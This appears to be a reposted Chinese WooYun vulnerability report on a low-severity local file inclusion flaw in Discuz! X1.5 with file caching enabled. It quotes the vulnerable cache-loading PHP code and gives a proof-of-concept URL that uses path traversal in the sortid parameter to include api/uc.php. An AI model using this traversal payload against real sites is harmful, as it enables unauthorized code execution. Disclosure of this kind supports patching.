discuz 1.5 本地文件包含漏洞

漏洞概要

缺陷编号: WooYun-2011-01195

漏洞标题: DISCUZX1.5 本地文件包含漏洞

相关厂商: Discuz!

漏洞作者: Jannock

提交时间: 2011-01-20

公开时间: 2011-02-19

漏洞类型: 本地文件包括

危害等级: 低

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org

分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣


漏洞详情

简要描述:

DISCUZX1.5 本地文件包含

详细说明:

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php
$_config[‘cache’][‘type’] = ‘file’;

function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}

……
}

地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

漏洞证明:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了。

发表评论?

0 条评论。

发表评论